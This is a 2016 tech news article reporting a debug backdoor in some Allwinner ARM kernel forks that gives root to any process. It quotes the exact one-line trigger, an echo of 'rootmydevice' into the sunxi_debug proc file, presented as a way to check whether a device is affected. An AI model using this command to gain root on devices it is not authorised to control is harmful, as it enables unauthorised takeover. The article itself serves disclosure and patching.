Some Allwinner Kernel Forks Contain Easy Root Exploit

By Daniel Fuller May 12, 2016, 8:11am
Share This Article:

Chinese chipmaker and device OEM Allwinner, who recently unveiled their very own laptop, competes mostly on level with MediaTek in the budget space, but doesn't do quite as well. Their chips normally end up in super-budget phones, handheld game consoles and TV sticks. Thanks to this low popularity, they don't get a ton of community attention, which is why a flaw in a few versions of their in-house kernel code only recently came to light. Armbian, a branch of Debian Linux made for ARM processors and commonly used on boards like the Raspberry Pi, was responsible for the discovery of the bug.

The backdoor is actually quite simple and, thankfully, out in the open and easy to patch. Whether left in on purpose or something that happened to slip through quality control, some versions of Allwinner's ARM kernel contain a piece of code referencing an instruction called "rootmydevice". When any process, even a network process, calls on this code, root privileges are provided with no further questions asked. This bug is not present in all devices with Allwinner chips, only certain chips that mostly fall into the Pi device family and a few device trees for Android devices. The code is actually declared openly in the logcat on device boot and is simple enough to find in the device code, even on Allwinner's GitHub, practically ruling out any malicious intent. In all likelihood, it's the result of a slip-up, leaving a debugging and developing process in a final release. It could also be there to help users easily accomplish root tasks on their devices. In any case, Allwinner has been mostly tight lipped about the issue.

The code has, as of this writing, not been fixed upstream, meaning that if you happen to own a device with the exploit, you'll have to wait for an update to patch it. If you compiled the kernel yourself from upstream sources, such as for your own Linux variant for ARM devices, it should be no chore to simply use CTRL+F to find the code and delete it. To check if your device has the exploit, crack open a terminal or use ADB to issue the command, " echo "rootmydevice" > /proc/sunxi_debug/sunxi_debug ", obviously without the outer quotes. If you are not greeted with a message saying you have root privileges, your device does not have the exploit. For full details on the Armbian community's findings, head through the source link.

You May Like These
More Like This:
May 12, 2016, 8:11am
Source: Armbian Via: Ars Technica
Share This Article:
Android HeadlinesWe Are HiringApply Now